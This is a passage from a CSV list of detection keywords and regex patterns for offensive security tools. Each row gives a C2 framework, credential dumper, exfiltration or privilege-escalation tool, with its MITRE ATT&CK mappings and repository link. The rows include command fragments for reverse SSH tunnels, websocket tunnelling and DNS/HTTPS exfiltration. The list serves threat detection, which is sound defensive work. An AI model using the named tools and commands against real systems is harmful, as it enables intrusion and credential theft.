cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*src/ligolo*",".{0,1000}src\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*src/obfuscator.c*",".{0,1000}src\/obfuscator\.c.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*src/Remote/chromeKey/*",".{0,1000}src\/Remote\/chromeKey\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*src/Remote/lastpass/*",".{0,1000}src\/Remote\/lastpass\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*src/Remote/sc_config/*",".{0,1000}src\/Remote\/sc_config\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*src/Remote/sc_create/*",".{0,1000}src\/Remote\/sc_create\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*src/Remote/sc_delete/*",".{0,1000}src\/Remote\/sc_delete\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*src/Remote/sc_start/*",".{0,1000}src\/Remote\/sc_start\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*src/ShellGhost.c*",".{0,1000}src\/ShellGhost\.c.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","10","1025","127","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z" "*Src/Spray-AD*",".{0,1000}Src\/Spray\-AD.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","410","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*src/tests/NESSIE/*",".{0,1000}src\/tests\/NESSIE\/.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*src/zerologon.c*",".{0,1000}src\/zerologon\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","152","42","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" "*src\CMLootOut\*",".{0,1000}src\\CMLootOut\\.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","0","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*src\pamspy.c*",".{0,1000}src\\pamspy\.c.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*src\unhook.c*",".{0,1000}src\\unhook\.c.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","941","169","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*src\unhook.c*",".{0,1000}src\\unhook\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/unhook-bof","1","0","N/A","10","10","256","57","2021-09-18T18:12:41Z","2021-01-13T02:20:44Z" "*srde dns -*",".{0,1000}srde\sdns\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*srde https -*",".{0,1000}srde\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*srde_release dns -k *",".{0,1000}srde_release\sdns\s\-k\s.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*srde_release https -i *",".{0,1000}srde_release\shttps\s\-i\s.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*srv.(MerlinServer).Exe*",".{0,1000}srv\.\(MerlinServer\)\.Exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*srvsvc_##*",".{0,1000}srvsvc_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*ss -tunlp || netstat -tunlp*127.0.0.1*",".{0,1000}ss\s\-tunlp\s\|\|\snetstat\s\-tunlp.{0,1000}127\.0\.0\.1.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*ssf.exe -D * -p * 127.0.0.1*",".{0,1000}ssf\.exe\s\-D\s.{0,1000}\s\-p\s.{0,1000}\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","ssfd","sets up a communication channel possibly for command and control (C2) or exfiltration purposes","T1218.011","TA0005","N/A","N/A","C2","https://github.com/securesocketfunneling/ssf","1","0","N/A","10","10","1550","234","2021-05-24T17:29:16Z","2015-06-01T17:34:23Z" "*ssfd.exe -p *",".{0,1000}ssfd\.exe\s\-p\s.{0,1000}","offensive_tool_keyword","ssfd","sets up a communication channel possibly for command and control (C2) or exfiltration purposes","T1218.011","TA0005","N/A","N/A","C2","https://github.com/securesocketfunneling/ssf","1","0","N/A","10","10","1550","234","2021-05-24T17:29:16Z","2015-06-01T17:34:23Z" "*ssh -N -R 4567:localhost:*root*",".{0,1000}ssh\s\-N\s\-R\s4567\:localhost\:.{0,1000}root.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","0","N/A","10","10","50","4","2024-04-12T15:25:40Z","2023-04-19T10:59:30Z" "*ssh -o ProxyCommand=""wstunnel*",".{0,1000}ssh\s\-o\sProxyCommand\=\""wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*ssh_key_privesc(payload*",".{0,1000}ssh_key_privesc\(payload.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*ssh_write_privesc(payload*",".{0,1000}ssh_write_privesc\(payload.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*SSH-2.0-OpenSSH_6.7p2*",".{0,1000}SSH\-2\.0\-OpenSSH_6\.7p2.{0,1000}","offensive_tool_keyword","OpenSSH Trojan","openssh trojan - non existing banner in official OpenSSH - only observed in compromised routers (APT28)","T1071 - T1059 - T1021 - T1065 - T1090 - T1563 - T1132 - T1078","TA0002 - TA0005 - TA0011","Moobot OpenSSH Trojan","APT28","Malware","https://www.ic3.gov/Media/News/2024/240227.pdf","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ssh2john *",".{0,1000}ssh2john\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ssh2john.py*",".{0,1000}ssh2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ssh-auditor*",".{0,1000}ssh\-auditor.{0,1000}","offensive_tool_keyword","ssh-auditor","The best way to scan for weak ssh passwords on your network.","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ncsa/ssh-auditor","1","0","N/A","N/A","6","590","84","2023-12-18T21:46:18Z","2016-11-08T22:47:38Z" "*sshbrute.py*",".{0,1000}sshbrute\.py.{0,1000}","offensive_tool_keyword","burpsuite","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","6","512","113","2024-04-17T22:22:22Z","2021-08-18T08:58:14Z" "*SSHBruteForce.py*",".{0,1000}SSHBruteForce\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*sshimpanzee --*",".{0,1000}sshimpanzee\s\-\-.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*sshimpanzee:127.0.0.1:*",".{0,1000}sshimpanzee\:127\.0\.0\.1\:.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*sshimpanzee-1.1-exp*",".{0,1000}sshimpanzee\-1\.1\-exp.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*sshimpanzee-main*",".{0,1000}sshimpanzee\-main.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*sshkey_persistence.*",".{0,1000}sshkey_persistence\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ssh-keygen not found in PATH, cannot escalate using SSH key*",".{0,1000}ssh\-keygen\snot\sfound\sin\sPATH,\scannot\sescalate\susing\sSSH\skey.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*sshLooterC*",".{0,1000}sshLooterC.{0,1000}","offensive_tool_keyword","sshLooterC","script to steel password from ssh - Its the C version of sshLooter. which was written in python and have a lot of dependencies to be installed on the infected machine. Now with this C version. you compile it on your machine and send it to the infected machine without installing any dependencies.","T1003 - T1059 - T1083 - T1566 - 